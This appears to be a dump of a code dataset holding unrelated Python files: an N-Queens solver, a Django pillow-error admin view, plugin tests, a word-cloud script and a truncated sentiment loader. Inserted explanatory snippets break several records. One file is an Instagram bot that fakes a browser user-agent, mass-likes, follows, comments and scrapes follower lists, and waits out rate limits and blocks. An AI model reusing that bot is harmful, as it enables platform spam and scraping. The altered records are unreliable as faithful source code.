sum(p.numel() for p in self.parameters() \\\r\n if p.requires_grad)\r\n num_pM = num_p/1e6\r\n logging.info(\"Total trainable 
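The fit() loop above uses the standard ordering for clipped gradient descent: zero the gradients, backpropagate, clip, then step. The same skeleton in isolation (model, optimizer, loss_fn, X and y are placeholders):

import torch
from torch.nn.utils import clip_grad_norm_

def train_step(model, optimizer, loss_fn, X, y, max_norm=1.0):
    optimizer.zero_grad()
    loss = loss_fn(model(X), y)
    loss.backward()
    total_norm = clip_grad_norm_(model.parameters(), max_norm)  # norm before clipping
    optimizer.step()
    return loss.item(), float(total_norm)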
parameters:\\t{:.1f} M\".format(num_pM))\r\n logging.info(\"\\n\")","sub_path":"code/pytorch_models/multitask/multitask_model_pre_rework.py","file_name":"multitask_model_pre_rework.py","file_ext":"py","file_size_in_byte":22025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"293237475","text":"class Solution(object):\n def __init__(self):\n self.count = 0\n\n def totalNQueens(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n def helper(sol, row):\n if row == len(sol):\n self.count += 1\n return\n for i in range(len(sol)):\n sol[row] = i\n if valid(sol, row):\n helper(sol, row + 1)\n \n def valid(sol, row):\n for i in range(row):\n if sol[i] == sol[row] or abs(sol[i] - sol[row]) == row - i:\n return False\n return True\n \n sol = [0 for i in range(n)]\n helper(sol, 0)\n return self.count\n","sub_path":"python_solutions/52-n-queens-ii.py","file_name":"52-n-queens-ii.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"314208206","text":"import time, requests, json, re\n\nclass Insta():\n def __init__(self, username, password):\n self.insta_status = 'unknow'\n self.username = username\n self.password = password\n self.last_follow_time=0\n self.last_unfollow_time = 0\n self.last_comment_time = 0\n self.last_like_time=0\n self.likes_count=0\n self.comments_count=0\n self.already_liked=[]\n self.like_paused_to =0\n self.ses = requests.Session()\n self.ses.headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',\n 'Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0',\n 'Accept-Encoding': 'gzip, deflate, sdch, br',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'origin': 'https://www.instagram.com',\n 'Referer': 'https://www.instagram.com',\n 'Host': 'www.instagram.com'\n }\n\n def login(self):\n param = {'username': self.username, 'password': self.password}\n\n response = self.ses.get('https://www.instagram.com', timeout=10)\n\n self.csrftoken = response.cookies.get_dict()['csrftoken']\n self.ses.headers.update({'x-csrftoken': str(self.csrftoken)})\n\n response = self.ses.post('https://www.instagram.com/accounts/login/ajax/', data=param, timeout=10)\n if response.status_code == requests.codes.ok:\n #print(response.text)\n r=json.loads(response.text)\n if r['authenticated']!=True:\n self.insta_status = 'False authenticated'\n print('False authentcated')\n return False\n response = self.ses.get('https://www.instagram.com/', timeout=10)\n # print(response.text)\n print('Logged as', self.username)\n self.insta_status = 'ok'\n response = self.ses.get('https://www.instagram.com/'+self.username+'?__a=1', timeout=10)\n try:\n r = json.loads(response.text)\n except json.decoder.JSONDecodeError:\n # print(response.text)\n print(response.status_code)\n\n #print(r)\n self.user_id=r['user']['id']\n self.user_followed_by=r['user']['followed_by']['count']\n self.user_follows=r['user']['follows']['count']\n self.user_media_count= r['user']['media']['count']\n\n self.csrftoken = response.cookies.get_dict().get('csrftoken', self.csrftoken)\n self.ses.headers.update({'x-csrftoken': str(self.csrftoken)})\n # print(response.cookies.get_dict())\n return True\n elif response.status_code == 400:\n r = json.loads(response.text)\n if r['message']=='checkpoint_required':\n self.insta_status='checkpoint required'\n print(\"CHECKPOINT\")\n print(r)\n 
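A quick sanity check for the totalNQueens solution above: the number of distinct placements for small boards is a known sequence, so the backtracking count can be verified directly (Solution is the class defined above; a fresh instance is needed per call because the count accumulates on self):

expected = {1: 1, 2: 0, 3: 0, 4: 2, 5: 10, 6: 4, 7: 40, 8: 92}
for n, count in expected.items():
    assert Solution().totalNQueens(n) == count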
return False\n else:\n print(response.status_code, response.text)\n print('Login Error')\n return False\n\n def get_query(self,url,params={}):\n url = 'https://www.instagram.com/' + url\n while True:\n try:\n response = self.ses.get( url, params=params, timeout=10)\n except requests.exceptions.RequestException as e:\n print(e)\n time.sleep(15)\n continue\n\n self.csrftoken = response.cookies.get_dict().get('csrftoken', self.csrftoken)\n self.ses.headers.update({'x-csrftoken': str(self.csrftoken)})\n try:\n r = json.loads(response.text)\n except json.decoder.JSONDecodeError:\n if re.search('Sorry, something went wrong', response.text):\n print('Sorry, something went wrong')\n time.sleep(15)\n continue\n elif re.search('5xx Server Error', response.text):\n print('5xx Server Error')\n time.sleep(15)\n continue\n else:\n print('JD get error')\n print(response.text)\n print(response.status_code)\n break\n break\n\n\n # print(json.dumps(r, indent=4))\n return r\n\n\n def post_query(self,t,url,params={} ):\n self.ses.headers.update(\n {'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'})\n self.ses.headers.update({'x-requested-with': 'XMLHttpRequest', 'x-instagram-ajax': '1'})\n\n error_count=0\n url='https://www.instagram.com/'+url\n while True:\n if error_count>=3:\n print('Too many error')\n return False\n\n try:\n if t=='post':\n response = self.ses.post(url,data=params, timeout=10)\n elif t=='get':\n response = self.ses.get(url, params=params, timeout=10)\n except requests.exceptions.RequestException as e:\n print('POST QUERY',e)\n time.sleep(60)\n error_count += 1\n continue\n cs = response.cookies.get_dict().get('csrftoken', None)\n if cs:\n self.csrftoken = cs\n cs=response.cookies.get_dict().get('csrftoken', self.csrftoken)\n self.ses.headers.update({'x-csrftoken': str(self.csrftoken)})\n if response.status_code == 400:\n if re.search('been blocked from using', response.text):\n\n self.like_paused_to=1\n return False\n else:\n print('Probably deleted', response.text)\n return False\n elif response.status_code == 404:\n print('404 error', response.status_code, url, params)\n return False\n elif response.status_code != requests.codes.ok:\n if re.search('Sorry, too many requests. 
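get_query() and post_query() above hand-roll retry loops around time.sleep. For plain transport-level failures, requests can delegate retries to urllib3's Retry via an HTTPAdapter; a sketch, not a drop-in replacement for the status-code-specific handling above:

import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

ses = requests.Session()
retry = Retry(total=3, backoff_factor=15,
              status_forcelist=(429, 500, 502, 503, 504))
ses.mount('https://', HTTPAdapter(max_retries=retry))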
Please try again later.', response.text):\n print(response.status_code, 'Too many requests, wait 180 sec')\n time.sleep(180)\n error_count+=1\n continue\n elif re.search('temporarily blocked', response.text):\n print(response.status_code, response.text, 'temporarily blocked')\n time.sleep(60 * 60)\n return None\n\n try:\n r = json.loads(response.text)\n except:\n if re.search('Sorry, something went wrong', response.text):\n print('Sorry, something went wrong')\n time.sleep(15)\n error_count += 1\n continue\n elif re.search('5xx Server Error', response.text):\n print('5xx Server Error')\n time.sleep(15)\n error_count += 1\n continue\n else:\n print('Json Decode error',response.status_code, url,params )\n print(response.text)\n print('sleep 15 sec')\n time.sleep(15)\n error_count += 1\n continue\n if r.get('status',False):\n if r['status'] == 'fail':\n print(r)\n time.sleep(180)\n continue\n\n\n break\n\n return r\n st = r['status']\n\n def get_user_id_from_username(self,username):\n r=self.post_query('get',str(username)+'/?__a=1')\n if r and r.get('user',False) and r['user'].get('id',False):\n return r['user']['id']\n return None\n\n def get_user_followers(self,username):\n user_id = self.get_user_id_from_username(username)\n if user_id:\n nodes=self.get_followers( user_id)\n return list(map(lambda x: x['username'],nodes))\n return None\n\n def get_user_followings(self, username):\n user_id = self.get_user_id_from_username(username)\n if user_id:\n nodes = self.get_followings(user_id)\n return list(map(lambda x: x['username'], nodes))\n return None\n\n def get_followers(self, user_id):\n params={}\n params['ref']='relationships::follow_list'\n p='first('\n nodes=[]\n while True:\n params['q']='ig_user('+str(user_id)+'){followed_by.'+p+'50){count,page_info{end_cursor,has_next_page},nodes{id,followed_by_viewer,requested_by_viewer,username}}}'\n r=self.post_query('post','query/',params)\n r = r['followed_by']\n # print(r)\n # print(len(r['nodes']))\n nodes+=r['nodes']\n if not r['page_info']['has_next_page']:\n break\n p='after('+r['page_info']['end_cursor']+','\n # print(len(nodes))\n return nodes\n\n def get_followings(self, user_id):\n params={}\n params['ref']='relationships::follow_list'\n p='first('\n nodes=[]\n while True:\n params['q']='ig_user('+str(user_id)+'){follows.'+p+'50){count,page_info{end_cursor,has_next_page},nodes{id,followed_by_viewer,requested_by_viewer,username}}}'\n r=self.post_query('post','query/',params)\n if not r.get('follows',False):\n print('Not follows',r)\n return []\n r = r['follows']\n # print(r)\n # print(len(r['nodes']))\n nodes+=r['nodes']\n if not r['page_info']['has_next_page']:\n break\n p='after('+r['page_info']['end_cursor']+','\n # print(len(nodes))\n return nodes\n\n def get_user_posts(self, username):\n user_id=self.get_user_id_from_username(username)\n if user_id:\n params = {}\n params['ref'] = 'users::show'\n p='first('\n nodes=[]\n while True:\n params['q']='ig_user('+str(user_id)+'){media.'+p+'50){count,page_info{end_cursor,has_next_page},nodes{id,date, code}}}'\n r=self.post_query('post','query/',params)\n\n if not r.get('media', False):\n print('NO MEDIA',r)\n return []\n nodes+= r['media']['nodes']\n break # only first page\n if not r['media']['page_info']['has_next_page']:\n break\n if not r['media']['page_info']['end_cursor']:\n break\n try:\n p='after('+r['media']['page_info']['end_cursor']+','\n except:\n print(r)\n exit()\n return list(map(lambda x: x['code'], nodes))\n return None\n\n def get_commenters_from_post(self,post_code):\n 
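# --- Illustrative aside (hedged sketch) ---
# get_followers() and get_followings() above both walk the same cursor-paged
# response shape: append page['nodes'], stop when has_next_page is false.
# fetch_page below is a hypothetical callable standing in for the API call,
# returning {'nodes': [...], 'page_info': {'end_cursor': ..., 'has_next_page': bool}}.
def collect_all_pages(fetch_page):
    nodes, cursor = [], None
    while True:
        page = fetch_page(cursor)
        nodes += page['nodes']
        if not page['page_info']['has_next_page']:
            return nodes
        cursor = page['page_info']['end_cursor']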
users_list=[]\n r = self.post_query('get', 'p/' +post_code+'/?__a=1')\n if r and r.get('media',False) and r['media'].get('comments',False) and r['media']['comments'].get('nodes',False):\n for n in r['media']['comments']['nodes']:\n users_list.append(n['user']['username'])\n return users_list\n return None\n\n def get_likers_from_post(self,post_code):\n users_list=[]\n r = self.post_query('get', 'p/' +post_code+'/?__a=1')\n if r and r.get('media',False) and r['media'].get('likes',False) and r['media']['likes'].get('nodes',False):\n for n in r['media']['likes']['nodes']:\n users_list.append(n['user']['username'])\n return users_list\n return None\n\n def like_count(self,user_id):\n params = {}\n params['ref'] = 'users::show'\n\n p='first('\n nodes=[]\n while True:\n params['q']='ig_user('+str(user_id)+'){media.'+p+'50){count,page_info{end_cursor,has_next_page},nodes{id,comments{count},likes{count}}}}'\n r=self.post_query('post','query/',params)\n if not r.get('media', False):\n print('NO MEDIA',r)\n return 0,0\n nodes+= r['media']['nodes']\n # print(r)\n # print(len(r['nodes']))\n\n if not r['media']['page_info']['has_next_page']:\n break\n p='after('+r['media']['page_info']['end_cursor']+','\n # print(len(nodes))\n likes=0\n comments=0\n for node in nodes:\n likes+=node['likes']['count']\n comments+=node['comments']['count']\n print('Media:',len(nodes),' Likes:', likes,' Comments:',comments)\n self.likes_count = likes\n self.comments_count = comments\n return likes,comments\n\n def like(self, post_id):\n if post_id in self.already_liked:\n print('Already liked')\n return False\n\n r = self.post_query('post','web/likes/' + str(post_id) + '/like/')\n if r:\n st = r['status']\n\n if st == 'ok':\n self.already_liked.append(post_id)\n return True\n #print('Like error',r)\n return False\n\n def dislike(self, post_id):\n self.ses.headers.update(\n {'Accept': '*/*', 'x-compress': 'null', 'Content-Type': 'application/x-www-form-urlencoded'})\n self.ses.headers.update({'x-requested-with': 'XMLHttpRequest', 'x-instagram-ajax': '1'})\n\n r = self.post_query('post','web/likes/' + str(post_id) + '/unlike/')\n st = r['status']\n if st == 'ok':\n return True\n\n return False\n\n def add_comment(self, post_id, text):\n self.ses.headers.update(\n {'Accept': '*/*', 'x-compress': 'null', 'Content-Type': 'application/x-www-form-urlencoded'})\n self.ses.headers.update({'x-requested-with': 'XMLHttpRequest', 'x-instagram-ajax': '1'})\n\n params = {'comment_text': str(text)}\n\n r = self.post_query('post','web/comments/' + str(post_id) + '/add/', params)\n if r:\n st=r['status']\n if st == 'ok':\n # self.ses.headers.update( { 'Content-Type': 'application/json'})\n # response = self.ses.post('https://www.instagram.com/ajax/bz', timeout=10)\n\n return True\n\n return False\n\n def explore_tag(self, hashtag):\n hashtag=hashtag.lower().strip(' ')\n param = {'__a': '1'}\n self.ses.headers.update({'accept': '*/*'})\n self.ses.headers.update({'x-requested-with': 'XMLHttpRequest'})\n\n r=self.post_query('get','explore/tags/' + hashtag + '/', param)\n return r\n\n def explore_location(self, place):\n param = {'__a': '1'}\n self.ses.headers.update({'accept': '*/*'})\n self.ses.headers.update({'x-requested-with': 'XMLHttpRequest'})\n r= self.post_query('get','explore/locations/' + str(place) + '/', param)\n return r\n\n def topsearch_place(self,name):\n r=self.post_query('get','web/search/topsearch/?context=place&query='+name)\n if r:\n return r['places']\n else:\n return None\n\n def follow(self,user_id):\n r= 
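# --- Illustrative aside (hedged sketch) ---
# like() above keeps already-liked post ids in a plain list, making each
# membership test O(n). A set preserves the same de-duplication in O(1);
# a minimal sketch, assuming post ids are hashable.
class LikeDeduper:
    def __init__(self):
        self._seen = set()

    def should_like(self, post_id):
        if post_id in self._seen:
            return False
        self._seen.add(post_id)
        return True

dedupe = LikeDeduper()
assert dedupe.should_like(42) and not dedupe.should_like(42)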
self.post_query('post','web/friendships/' + str(user_id) + '/follow/')\n if r:\n st = r['status']\n if st == 'ok':\n return True\n\n return False\n\n def unfollow(self, user_id):\n r=self.post_query('post','web/friendships/'+str(user_id)+'/unfollow/')\n if r:\n st = r['status']\n if st == 'ok':\n return True\n else:\n print('UNFOLLOW STATUS NOT OK', r, user_id)\n return False\n\n # def __repr__(self):\n # return self.username\n\n# Probably deleted {\"message\": \"This account can't be followed right now.\", \"status\": \"fail\"}\n","sub_path":"socialtune/instagr.py","file_name":"instagr.py","file_ext":"py","file_size_in_byte":16005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"198139880","text":"from wordcloud import WordCloud, STOPWORDS\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndf = pd.read_csv(r\"tweet_csv/test_pre.csv\", encoding =\"ISO-8859-1\")\ncomments= ' '\nstopwords = set(STOPWORDS)\n\n#wordcloud visuals for neg_tweets\nneg_tweets = df[df.pred == 0]\nneg_string = []\nfor t in neg_tweets.sentimenttext:\n neg_string.append(t)\nneg_string = pd.Series(neg_string).str.cat(sep=' ')\n\nwordcloud = WordCloud(width = 800, height = 800,\n background_color ='white',\n stopwords = stopwords,\n min_font_size = 10).generate(neg_string)\n\n# plot WordCloud image\nplt.figure(figsize = (8, 8), facecolor = None)\nplt.imshow(wordcloud)\nplt.axis(\"off\")\nplt.tight_layout(pad = 0)\nplt.show()\n","sub_path":"neg_wc.py","file_name":"neg_wc.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"642314906","text":"\"\"\"Tests the ``remove`` plugin.\"\"\"\n\nimport argparse\nfrom unittest.mock import Mock\n\nimport pytest\n\nimport moe\nfrom moe.core.library.album import Album\nfrom moe.core.library.extra import Extra\nfrom moe.core.library.session import session_scope\nfrom moe.core.library.track import Track\nfrom moe.plugins import remove\n\n\nclass TestParseArgs:\n \"\"\"Test the plugin argument parser.\"\"\"\n\n def test_track(self, tmp_session, mock_track):\n \"\"\"Tracks are removed from the database with valid query.\"\"\"\n args = argparse.Namespace(query=\"*\", album=False, extra=False)\n tmp_session.add(mock_track)\n\n remove._parse_args(config=Mock(), session=tmp_session, args=args)\n\n assert not tmp_session.query(Track).scalar()\n\n def test_album(self, tmp_session, mock_album):\n \"\"\"Albums are removed from the database with valid query.\"\"\"\n args = argparse.Namespace(query=\"*\", album=True, extra=False)\n tmp_session.merge(mock_album)\n\n remove._parse_args(config=Mock(), session=tmp_session, args=args)\n\n assert not tmp_session.query(Album).scalar()\n\n def test_extra(self, tmp_session, real_album):\n \"\"\"Extras are removed from the database with valid query.\n\n ``mock_album`` isn't working with this test. 
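# --- Illustrative aside (hedged sketch) ---
# The remove-plugin tests above fake parsed CLI arguments with
# argparse.Namespace and stub the config with unittest.mock.Mock. The same
# pattern in a self-contained form; handle() is a hypothetical function
# standing in for the code under test.
import argparse
from unittest.mock import Mock

def handle(config, args):
    return args.query if args.album else None

def test_handle_album():
    args = argparse.Namespace(query="*", album=True, extra=False)
    assert handle(Mock(), args) == "*"

test_handle_album()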
Likely something to do with\n the Extra primary key ``_filename`` and how we are mocking filesytem paths.\n \"\"\"\n args = argparse.Namespace(query=\"*\", album=False, extra=True)\n tmp_session.merge(real_album)\n assert real_album.extras\n\n remove._parse_args(config=Mock(), session=tmp_session, args=args)\n\n assert not tmp_session.query(Extra).scalar()\n\n def test_album_tracks(self, tmp_session, mock_album):\n \"\"\"Removing an album should also remove all of its tracks.\"\"\"\n args = argparse.Namespace(query=\"*\", album=True, extra=False)\n tmp_session.merge(mock_album)\n\n remove._parse_args(config=Mock(), session=tmp_session, args=args)\n\n assert not tmp_session.query(Track).scalar()\n\n def test_album_extras(self, tmp_session, mock_album):\n \"\"\"Removing an album should also remove all of its extras.\"\"\"\n args = argparse.Namespace(query=\"*\", album=True, extra=False)\n tmp_session.merge(mock_album)\n\n assert mock_album.extras\n remove._parse_args(config=Mock(), session=tmp_session, args=args)\n\n assert not tmp_session.query(Extra).scalar()\n\n def test_exit_code(self):\n \"\"\"Return a non-zero exit code if no items are removed.\"\"\"\n args = argparse.Namespace(query=\"bad\", album=False, extra=False)\n\n with pytest.raises(SystemExit) as error:\n remove._parse_args(config=Mock(), session=Mock(), args=args)\n\n assert error.value.code != 0\n\n\n@pytest.mark.integration\nclass TestCommand:\n \"\"\"Test cli integration with the remove command.\"\"\"\n\n def test_parse_args(self, real_track, tmp_path, tmp_config):\n \"\"\"Music is removed from the library when the `remove` command is invoked.\"\"\"\n cli_args = [\"remove\", \"*\"]\n config = tmp_config(settings='default_plugins = [\"remove\"]')\n config.init_db()\n with session_scope() as session:\n session.add(real_track)\n\n moe.cli.main(cli_args, config)\n\n with session_scope() as session2:\n assert not session2.query(Track).scalar()\n","sub_path":"tests/test_remove.py","file_name":"test_remove.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"24609716","text":"from datetime import datetime\nimport re\nfrom django.contrib import messages\nfrom django.core.mail.message import EmailMessage\nfrom django.urls import reverse\nfrom django.db import transaction\nfrom django.db.models.aggregates import Count\nfrom django.http.response import Http404\nfrom django.shortcuts import redirect\nfrom django.template.loader import render_to_string\nfrom django.utils.decorators import method_decorator\nfrom django.utils.translation import ugettext_noop as _\nfrom corehq.apps.domain.decorators import require_superuser\nfrom corehq.apps.hqwebapp.views import BasePageView\nfrom corehq.apps.hqpillow_retry.filters import PillowErrorFilter\nfrom corehq.apps.reports.datatables import DataTablesHeader, DataTablesColumn\nfrom corehq.apps.reports.dispatcher import AdminReportDispatcher\nfrom corehq.apps.reports.generic import GenericTabularReport, GetParamsMixin\nfrom corehq.apps.reports.standard import DatespanMixin\nfrom dimagi.utils.decorators.memoized import memoized\nfrom dimagi.utils.parsing import json_format_date\nfrom dimagi.utils.web import get_url_base\nfrom pillow_retry.models import PillowError\nfrom django.conf import settings\nfrom django.contrib.humanize.templatetags.humanize import naturaltime\n\nSOURCE_SINGLE = 'single'\nACTION_RESET = 'reset'\nACTION_DELETE = 'delete'\nACTION_SEND = 'send'\nACTIONS = [ACTION_RESET, 
ACTION_DELETE, ACTION_SEND]\n\n\ndef safe_format_date(date):\n return json_format_date(date) if date else date\n\n\nclass PillowErrorsReport(GenericTabularReport, DatespanMixin, GetParamsMixin):\n dispatcher = AdminReportDispatcher\n slug = 'pillow_errors'\n name = _('PillowTop Errors')\n section_name = _(\"ADMINREPORT\")\n asynchronous = False\n ajax_pagination = True\n base_template = 'reports/base_template.html'\n needs_filters = False\n\n fields = (\n 'corehq.apps.hqpillow_retry.filters.PillowErrorFilter',\n )\n\n report_template_path = 'hqpillow_retry/pillow_errors.html'\n\n @property\n def headers(self):\n return DataTablesHeader(\n DataTablesColumn('Error', sortable=False),\n DataTablesColumn('Pillow Class', sortable=True),\n DataTablesColumn('Created', sortable=True),\n DataTablesColumn('Next attempt', sortable=True),\n DataTablesColumn('Attempts (current / total)', sortable=True),\n DataTablesColumn('Error type', sortable=True),\n DataTablesColumn('Doc type', sortable=False),\n DataTablesColumn('Domain', sortable=False),\n DataTablesColumn('Select', sortable=False),\n )\n\n @property\n @memoized\n def pillow_error_filter(self):\n return PillowErrorFilter(self.request, None)\n\n @property\n @memoized\n def pillow_error_vals(self):\n return {item['slug']: item['value'] for item in self.pillow_error_filter.GET_values}\n\n @property\n def pillow(self):\n return self.pillow_error_vals.get('pillow')\n\n @property\n def error(self):\n return self.pillow_error_vals.get('error')\n\n @property\n def sort_descending(self):\n return self.request.GET.get('sSortDir_0', 'asc') == 'desc'\n\n @property\n def sort_field(self):\n sort_fields = [\n 'pillow',\n 'date_created',\n 'date_next_attempt',\n 'current_attempt',\n 'error_type'\n ]\n sort_index = int(self.request.GET.get('iSortCol_0', 2))\n sort_index = 1 if sort_index == 0 else sort_index - 1\n field = sort_fields[sort_index]\n return field if not self.sort_descending else '-{0}'.format(field)\n\n @property\n def shared_pagination_GET_params(self):\n return self.pillow_error_filter.shared_pagination_GET_params\n\n @property\n def total_records(self):\n query = self.get_query()\n return query.aggregate(Count('id'))['id__count']\n\n def get_query(self):\n query = PillowError.objects\n if self.pillow:\n query = query.filter(pillow=self.pillow)\n if self.error:\n query = query.filter(error_type=self.error)\n\n return query\n\n @property\n def rows(self):\n query = self.get_query()\n query = query.order_by(self.sort_field)\n\n next_deploy = _('Next Deploy')\n errors = query[self.pagination.start:(self.pagination.start+self.pagination.count)]\n for error in errors:\n metadata = error.change_metadata or {}\n yield [\n self.make_search_link(error),\n error.pillow.split('.')[-1],\n naturaltime(error.date_created),\n naturaltime(error.date_next_attempt) if error.has_next_attempt() else next_deploy,\n '{0} / {1}'.format(error.current_attempt, error.total_attempts),\n error.error_type,\n metadata.get('document_type'),\n metadata.get('domain'),\n self.make_checkbox(error)\n ]\n\n def make_search_link(self, error):\n return (\n '{text}'\n ''\n ' '\n ''\n ' '\n ''\n ).format(\n text='{}...'.format(error.doc_id[:5]),\n search_url=reverse(\"global_quick_find\"),\n doc_id=error.doc_id,\n search_title=_(\"Search HQ for this document: %(doc_id)s\") % {'doc_id': error.doc_id},\n raw_url=reverse(\"raw_couch\"),\n raw_title=_(\"Open the raw document: %(doc_id)s\") % {'doc_id': error.doc_id},\n error_url=reverse(EditPillowError.urlname),\n error_id=error.id,\n 
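# --- Illustrative aside (hedged sketch) ---
# sort_field above maps a DataTables column index onto an ORM field name and
# prefixes '-' for descending order (column 0 falls back to date_created).
# The same mapping as a standalone function:
SORT_FIELDS = ['pillow', 'date_created', 'date_next_attempt', 'current_attempt', 'error_type']

def sort_field(i_sort_col, descending):
    index = 1 if i_sort_col == 0 else i_sort_col - 1
    field = SORT_FIELDS[index]
    return '-' + field if descending else field

assert sort_field(0, False) == 'date_created'
assert sort_field(2, True) == '-date_created'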
error_title=_(\"View the details of this error: %(error_id)s\") % {'error_id': error.id}\n )\n\n def make_checkbox(self, error):\n return ''.format(error.id)\n\n\nclass EditPillowError(BasePageView):\n urlname = 'pillow_errors'\n page_title = \"Pillow Error Details\"\n template_name = 'hqpillow_retry/single.html'\n\n @method_decorator(require_superuser)\n def dispatch(self, request, *args, **kwargs):\n return super(EditPillowError, self).dispatch(request, *args, **kwargs)\n\n @property\n def page_context(self):\n error_id = self.request.GET.get('error')\n if not error_id:\n return {}\n\n try:\n error = PillowError.objects.get(id=error_id)\n except PillowError.DoesNotExist:\n raise Http404\n\n return {\n 'error': error\n }\n\n @property\n def page_url(self):\n return reverse(self.urlname)\n\n def post(self, request, *args, **kwargs):\n action = request.POST.get('action')\n source = request.POST.get('source')\n error_ids = []\n prefix = 'PillowError_'\n prefix_len = len(prefix)\n for p in request.POST:\n if p.startswith(prefix):\n error_ids.append(p[prefix_len:])\n\n redirect_url = None\n\n error_list_url = reverse('admin_report_dispatcher', args=('pillow_errors',))\n if not action or action not in ACTIONS:\n messages.error(self.request, _(\"Unknown action: '%(action)s'\") % {'action': action})\n elif not error_ids:\n messages.error(self.request, _(\"No error records specified\"))\n elif action == ACTION_SEND and not len(error_ids) == 1:\n messages.error(self.request, _(\"Only one error may be sent to FogBugs at a time.\"))\n else:\n with transaction.atomic():\n if action == ACTION_DELETE:\n PillowError.objects.filter(id__in=error_ids).delete()\n elif action == ACTION_RESET:\n PillowError.objects.filter(id__in=error_ids).\\\n update(current_attempt=0, date_next_attempt=datetime.utcnow(), queued=False)\n elif action == ACTION_SEND:\n self.bug_report(request.couch_user, error_ids[0])\n\n success = _(\"%(num)s records successfully %(action)s\") % {'num': len(error_ids), 'action': action}\n messages.success(self.request, success)\n\n if source == SOURCE_SINGLE and action == ACTION_DELETE:\n redirect_url = error_list_url\n\n redirect_url = redirect_url or request.META.get('HTTP_REFERER', error_list_url)\n return redirect(redirect_url)\n\n def bug_report(self, couch_user, error_id):\n error = PillowError.objects.get(id=error_id)\n\n context = {\n 'error': error,\n 'url': \"{}{}?error={}\".format(get_url_base(), reverse(EditPillowError.urlname), error_id)\n }\n message = render_to_string('hqpillow_retry/fb.txt', context)\n subject = 'PillowTop error: {} - {}'.format(error.pillow, error.error_type)\n\n reply_to = u'\"{}\" <{}>'.format(couch_user.full_name, couch_user.get_email())\n email = EmailMessage(\n subject=subject,\n body=message,\n to=settings.BUG_REPORT_RECIPIENTS,\n headers={'Reply-To': reply_to}\n )\n\n # only fake the from email if it's an @dimagi.com account\n if re.search('@dimagi\\.com$', couch_user.username):\n email.from_email = couch_user.username\n else:\n email.from_email = settings.CCHQ_BUG_REPORT_EMAIL\n\n email.send(fail_silently=False)\n","sub_path":"corehq/apps/hqpillow_retry/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"361923256","text":"\"\"\"\nsentence2vec : transfer sentences to vectors\nloaddata: load train/test/valid datas\nevaluation_metrics: return scores of (recall_p, recall_n, acc, prc, rc, f1, auc_) \n\"\"\"\nimport numpy as 
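# --- Illustrative aside (hedged sketch) ---
# EditPillowError.post() above recovers the checked error ids by scanning POST
# keys for the "PillowError_" prefix. The extraction step in isolation:
def extract_ids(post_keys, prefix='PillowError_'):
    return [key[len(prefix):] for key in post_keys if key.startswith(prefix)]

assert extract_ids(['PillowError_12', 'action', 'PillowError_7']) == ['12', '7']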
np\nimport torch\nfrom sklearn.metrics import roc_curve, auc, accuracy_score, recall_score, precision_score\nfrom sklearn.metrics import confusion_matrix, average_precision_score\n\nimport sys\nsys.path.append(\"../preprocess/\")\nfrom data_util import word2index, index2word\n\n# 输入一个句子和相应的词典,得到这个句子的向量化表示\n# 向量的尺寸为词典中词汇的个数,i位置上面的数值为第i个单词在sentence中出现的频率\ndef sentence2vec(sentence, dictionary):\n vector = np.zeros(len(dictionary))\n for l in sentence:\n vector[l] += 1\n return(1.0 * vector / len(sentence))\n\ndef loaddata(pos_sentences, neg_sentences, diction):\n \"\"\"\n input: pos_sentences, neg_sentences, diction\n output: train/test/valid texts, train/test/valid labels\n \"\"\"\n # 遍历所有句子,将每一个词映射成编码\n dataset = [] #数据集\n labels = [] #标签\n sentences = [] #原始句子,调试用\n # 处理正向评论\n for sentence in pos_sentences:\n new_sentence = []\n for l in sentence:\n if l in diction:\n new_sentence.append(word2index(l, diction))\n dataset.append(sentence2vec(new_sentence, diction))\n labels.append(0) #正标签为0\n sentences.append(sentence)\n\n # 处理负向评论\n for sentence in neg_sentences:\n new_sentence = []\n for l in sentence:\n if l in diction:\n new_sentence.append(word2index(l, diction))\n dataset.append(sentence2vec(new_sentence, diction))\n labels.append(1) #负标签为1\n sentences.append(sentence)\n\n #打乱所有的数据顺序,形成数据集\n # indices为所有数据下标的一个全排列\n indices = np.random.permutation(len(dataset))\n\n #重新根据打乱的下标生成数据集dataset,标签集labels,以及对应的原始句子sentences\n dataset = [dataset[i] for i in indices]\n labels = [labels[i] for i in indices]\n sentences = [sentences[i] for i in indices]\n\n #对整个数据集进行划分,分为:训练集、校准集和测试集,其中校准和测试集合的长度都是整个数据集的10分之一\n test_size = len(dataset) // 10\n train_data = dataset[2 * test_size :]\n train_label = labels[2 * test_size :]\n\n valid_data = dataset[: test_size]\n valid_label = labels[: test_size]\n\n test_data = dataset[test_size : 2 * test_size]\n test_label = labels[test_size : 2 * test_size]\n\n return (train_data, train_label, test_data, test_label, valid_data, valid_label)\n\ndef evaluation_metrics(y_trues, y_pred_probs):\n fpr, tpr, thresholds = roc_curve(y_true=y_trues, y_score=y_pred_probs, pos_label=1)\n auc_ = auc(fpr, tpr)\n\n y_preds = [1 if p >= 0.5 else 0 for p in y_pred_probs]\n\n acc = accuracy_score(y_true=y_trues, y_pred=y_preds)\n prc = precision_score(y_true=y_trues, y_pred=y_preds)\n rc = recall_score(y_true=y_trues, y_pred=y_preds)\n f1 = 2 * prc * rc / (prc + rc)\n\n \"\"\"\n print('\\n***------------***')\n print('Evaluating AUC, F1, +Recall, -Recall')\n print('Test data size: {}, Incorrect: {}, Correct: 